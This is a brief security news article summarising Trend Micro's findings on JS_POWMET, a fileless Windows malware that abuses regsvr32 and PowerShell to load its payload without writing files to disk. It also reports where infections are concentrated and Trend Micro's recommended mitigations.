A newly observed Windows malware called JS_POWMET features an end-to-end fileless infection chain, installing itself without a trace on the hard drive by compromising an autostart registry procedure.
Such discoveries are rare, explains Trend Micro in a Wednesday blog post, because most fileless malware programs are technically only fileless when first infecting a user’s system. Upon actually executing the main malicious payload, they typically end up themselves, the post continues.
But not JS_POWMET, which leaves no evidence of on the machine itself, making it difficult for researchers to analyze it.
“In this method, a URL was given to regsvr32 [the Microsoft Register Server] as a parameter, which will make regsvr32 capable of fetching the file… found on the URL. Due to this routine, regsvr32 will become capable of executing arbitrary scripts without saving the XML file on the machine/system. In particular, whenever the affected machine starts up, it will automatically download the malicious file from its Command & Control (C&C) server,” the blog post states.
Next, JS_POWMET downloads a secondary file, a Powershell script called TROJ_PSINJECT, which connects to a website from which a file called favicon is downloaded. “The favicon file will then be decrypted and injected into its process using ReflectivePELoader, which is used for injecting EXE/DLL files,” the blog post continues.
According to Trend Micro researchers, nearly 90 percent of JS_POWMET infections have affected targets in the Asia-Pacific region. In all likelihood, most infections occur due to either malware droppers or from visiting malicious sites.
“While JS_POWMET and the rest of the files it downloads are relatively light in terms of impact, this malware demonstrates the lengths cybercriminals will go to avoid detection and analysis,” wrote blog post author Michael Villanueva, Trend Micro threat research engineer. “It also shows that even relatively uncommon infection methods involving fileless malware continually evolve.”
To mitigate such threats, Trend Micro recommends use container-based systems to limit access to important infrastructure, as well as disabling Powershell.